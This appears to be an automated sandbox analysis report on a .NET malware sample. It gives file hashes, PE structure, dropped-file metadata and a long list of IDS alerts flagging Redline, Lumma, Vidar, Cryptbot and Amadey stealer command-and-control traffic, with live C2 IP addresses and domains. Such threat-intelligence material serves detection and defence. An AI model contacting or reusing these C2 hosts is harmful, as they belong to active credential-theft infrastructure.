                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                        Entropy (8bit):4.394431195264694
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:42BB0DE5407C3DC4822F726E0F36ED80
                                                                                                                                                                                                                                        SHA1:B389B615CEC900E53302425E3980EF791F386941
                                                                                                                                                                                                                                        SHA-256:D5AAFB00533A11C1066C3A90F010992FCC998FB5778D314BA64F4D4ABD6DE124
                                                                                                                                                                                                                                        SHA-512:886720825F73FDEAB614C3B47554DDBEEE83CB561398D97B6FC60C1687259D6BA2DCAA1203A9B921F549F86CB6BC61EE695EBB3EB705EBDA50AB4BE05E3C7C59
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm")n.$................................................................................................................................................................................................................................................................................................................................................/y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3
                                                                                                                                                                                                                                        Entropy (8bit):0.9182958340544896
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:0C11BB317BD26E93C30821526C3834BD
                                                                                                                                                                                                                                        SHA1:70B99746FBF26B12B541D4C1A8451FD98B249BB2
                                                                                                                                                                                                                                        SHA-256:7393BA4F11E19A5F6BEE10ED995B0D959A52C4470855F6D68D4D1E34E26CB70F
                                                                                                                                                                                                                                        SHA-512:62AD6D1D2DABFFDBC800B416A01546C0337EC8B350112E6C09101D847D42BFBDE44C2B3949D3397FCC08BBF2800604FB5A700D71750DB24CF7E15D67AB07E726
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...
                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.941763956114646
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                        File name:SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                                                                                                                                                                                                                                        File size:2'457'088 bytes
                                                                                                                                                                                                                                        MD5:96cb7df578398d5d46dd4daeffbdc41f
                                                                                                                                                                                                                                        SHA1:7b7ecf7d006c2e2cd2b237dde3402f6b78e6c54b
                                                                                                                                                                                                                                        SHA256:e301b79d4279d52c49c886fcd0ab8acc3941c5cf28c7dd0eb57e8af81fe476fb
                                                                                                                                                                                                                                        SHA512:84e915d323b1595c387123f7f5d8b5d291e2c2c9a8df9e4eba69deff9cc0ba195872065daa6f1c808a848eb8fd259cfd5f5ea164b8a3c9407bd6ca25fffc8479
                                                                                                                                                                                                                                        SSDEEP:49152:Al0Ivwg2krKlsBijSIpWALFfi1zfPmX9YSVY8ZAAiJte:tIvliWVA9i1Te2SVYYAD
                                                                                                                                                                                                                                        TLSH:E2B501A88275896CE4D9C5F4F1A6CE1F2E774B2138CDC389F6696EB8D93312ED114423
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... V...............P..l#...........#.. ....#...@.. ........................%...........@................................
                                                                                                                                                                                                                                        Icon Hash:073b7343ccf25803
                                                                                                                                                                                                                                        Entrypoint:0x6389fe
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x9C5620ED [Tue Feb 11 12:37:01 2053 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2389a90x4f.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x23a0000x20d4c.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25c0000xc.reloc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x2388f80x38.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        .text0x20000x236a040x236c00ad17acdcf138eb7f4a5c04f7df2e147funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .rsrc0x23a0000x20d4c0x20e00230606391ada7a5f112675214d6f4876False0.4044156962927757data5.1906625929543475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .reloc0x25c0000xc0x20068da1c7ffb326306242633f0d1b25badFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_ICON0x23a1a00x80a9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9884931839572517
                                                                                                                                                                                                                                        RT_ICON0x24225c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.1811043416538507
                                                                                                                                                                                                                                        RT_ICON0x252a940x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.2531294284364667
                                                                                                                                                                                                                                        RT_ICON0x256ccc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.29512448132780084
                                                                                                                                                                                                                                        RT_ICON0x2592840x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.3625703564727955
                                                                                                                                                                                                                                        RT_ICON0x25a33c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.526595744680851
                                                                                                                                                                                                                                        RT_GROUP_ICON0x25a7b40x5adata0.7666666666666667
                                                                                                                                                                                                                                        RT_VERSION0x25a8200x32cdata0.46921182266009853
                                                                                                                                                                                                                                        RT_MANIFEST0x25ab5c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        mscoree.dll_CorExeMain
                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                        2024-09-21T14:48:08.851174+02002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.949712103.130.147.21180TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:09.021938+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949712103.130.147.21180TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:09.021938+02002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.949712103.130.147.21180TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:09.432484+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949711147.45.44.10480TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:09.443354+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949713176.113.115.3380TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:09.573759+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709147.45.44.10480TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:09.642506+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949718176.111.174.10980TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:10.468985+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709147.45.44.10480TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:10.625354+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949726162.241.61.218443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:10.640521+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949729162.241.61.218443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:10.682067+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709147.45.44.10480TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:10.933255+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949725185.166.143.48443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:11.772275+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949731162.241.61.218443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:12.772362+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949711147.45.44.10480TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:13.239610+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949711147.45.44.10480TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:15.698202+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949711147.45.44.10480TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:41.408032+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.9497395.53.124.19580TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:45.473784+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949743116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:46.523820+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:46.523820+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:46.745662+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1193.233.255.844284192.168.2.949745TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:47.475216+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949746116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:49.155853+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949747116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:49.994066+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.949747116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:51.096686+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949751116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:51.791197+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.165.127443192.168.2.949751TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:51.939916+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:52.638117+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949753116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:53.441147+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.165.127443192.168.2.949753TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:55.457255+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.9497555.53.124.19580TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:55.664418+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:55.669580+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1193.233.255.844284192.168.2.949745TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:55.858794+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949754116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:55.897035+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:56.226962+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:56.232234+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:56.625756+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949756116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:57.753719+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:57.979757+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:48:58.314046+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:00.380021+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949757116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:01.262485+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949758116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:02.729114+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949760116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:03.446407+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949761116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:04.004318+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.9574721.1.1.153UDP
                                                                                                                                                                                                                                        2024-09-21T14:49:05.162152+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:05.548457+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:05.708059+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949763116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:07.617661+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.9497645.53.124.19580TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:07.620133+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949765116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:09.447293+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949766116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:10.895143+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949767116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:12.300715+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949768116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:16.052524+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949769116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:17.473958+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:18.007186+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949770116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:18.347277+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:19.877574+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949771116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:19.905417+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.94977245.202.35.10180TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:22.279030+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:22.571458+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:22.732950+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949773116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:22.795755+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:23.027049+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:23.250649+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:23.481145+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:23.722893+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:25.544839+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949774116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:27.944033+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949775116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:30.781974+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949776147.45.44.10480TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:32.809731+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.949745193.233.255.844284TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:33.488490+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949777116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:33.724983+02002055834ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sentistivowmi .shop)1192.168.2.9577071.1.1.153UDP
                                                                                                                                                                                                                                        2024-09-21T14:49:33.942101+02002056008ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chickerkuso .shop)1192.168.2.9633501.1.1.153UDP
                                                                                                                                                                                                                                        2024-09-21T14:49:34.728572+02002056009ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI)1192.168.2.949779172.67.173.81443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:35.003496+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949779172.67.173.81443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:35.003496+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949779172.67.173.81443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:36.410251+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949780116.203.165.127443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:37.126950+02002056022ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionmwq .shop)1192.168.2.9557421.1.1.153UDP
                                                                                                                                                                                                                                        2024-09-21T14:49:37.607786+02002056023ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI)1192.168.2.949781104.21.85.92443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:37.890382+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.949782185.196.8.21480TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:38.407829+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949781104.21.85.92443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:38.407829+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949781104.21.85.92443TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:39.706883+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.949783185.196.8.21480TCP
                                                                                                                                                                                                                                        2024-09-21T14:49:39.736965+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.94978445.132.206.25180TCP
